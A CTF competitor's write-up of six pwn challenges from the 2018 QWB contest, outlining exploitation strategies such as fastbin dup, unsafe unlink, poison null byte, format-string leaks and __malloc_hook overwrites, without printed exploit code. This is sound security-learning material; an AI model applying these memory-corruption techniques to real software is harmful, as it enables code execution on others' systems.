2018强网杯QWB Writeup



Keep writing in English, sorry for it's title contains chinese :-D,beause I can't find appropriate words to describe this three chinese characters.

Excellent capture the flag game by examiners.
I accomplished six pwn problems fortunately.
Now I‘ll make a short record and summary.

silent

A simple fastbin attack problem with a use after free vulnerability.
Double free trigger fastbin dup and overwirte got['free'] to plt['system'].

No more detailed description.

silent2

A little different from silent1 is to limit the alloc size must larger than 0x80, it means we can't use fastbins but smallbins or largerbins.

Use after free exists as before ,So consider about use double free to trigger Unlink and cause arbitrarily 8 byte write.
Unsafe unlink will make pointer to .bss section and the next steps the same as silent1.

By the way, the two problems does not have stable output beause of system("cat banner.txt"); We can’t predict the content of banner.txt so sometimes it makes remote connect failed.

As follows,sleep and zio will make scenario more stable in remote connection. e…

raisepig

If I'm not mistaken, raisepig adapt from Pwnable.tw Secret Garden
Refer to my lucky writeup Pwnable.tw secretgarden

I'm confused about one_gadgets in local environment and remote environment, successful one_gadget in local failed when remoting.
Luckily,Try to trigger malloc_printerr will make one_gadget effect in both two environments.

gamebox

predictable RNG + poison null byte + fastbin corruption.
I guess it was adapted from Pwnable.tw Secret Of My Heart,looks like a little similar.

Frist,we can predictable every role's cookies and store up.

Then, there are two vulnerabilities

  • Obvious format string in show function.
  • Off-by-one when create a role.

  1. Use format-string to leak proc address and libc address to bypass PIE and ASLR.
  2. Exploit the predictable RNG to calculate every role's cookie.
  3. Use the poison null byte technique to create overlapped chunk
  4. Use fastbin corruption to overwrite __malloc_hook to one_gadgets

In the end, attempt to different one_gadgets and even change posture instead to GET SHELL.:-D

opm

Obvious stack overflow with two gets, but need a little skill to make use of it.

If we directly use stack smash will destroy v6 in stack frame which stores heap address and cause error.
So we have to partial overwrite.
The structure of roles as follows:

Proc address and heap address are store in it,so my idea is to leak heap and change the pointer to leak proc then bypss PIE.

The first gets overflow can use for shifting the position of structure,and second one use for leaking, the strategy of leaking heap address are as follows:

  1. overflow 2 byte (gets will leave "\x00" at the end of string) write a role structure to a known address.
  2. overflow 1 byte "\x00" to write heap_address into role->name address with structure is known by us in step 1.
  3. use the second gets overflow 2 byte to the known address and leak heapaddress.
    :-D…A little puzzled? Show your the code.

Remaining work is easy ,leaking libc_address, hijack GOT table and so on.

note

malloc_consolidate unlink.
Frist meet this technology in Prediy CTF although it's a lit different. ReeHY
Briefly,Vulnerability is also a off-by-one in title function.

we can overwirte the next chunk's size with a filter_char as below:

We chose @(0x40), for the preparation of unlink.
Layout fake chunk in heap as shown in my scenario and try to trigger malloc_considate to unlink our fake fastbin.
In the end, use the result of unlink for arbitrarily reading and writing.
Thanks to myself, I got flag at 8.55pm and the competition finished at 9.00pm.
Emmm. Don't give up..

Great regret for the two linux kernel exploit problems, core and solid_core. As a beginner of linux-kernel-exploit ,lack of experience for debugging makes me crazy for my exp.c goes wrong.
Thank you for my seniors to organize such a magnificent competition,catch up with all of you!

发表评论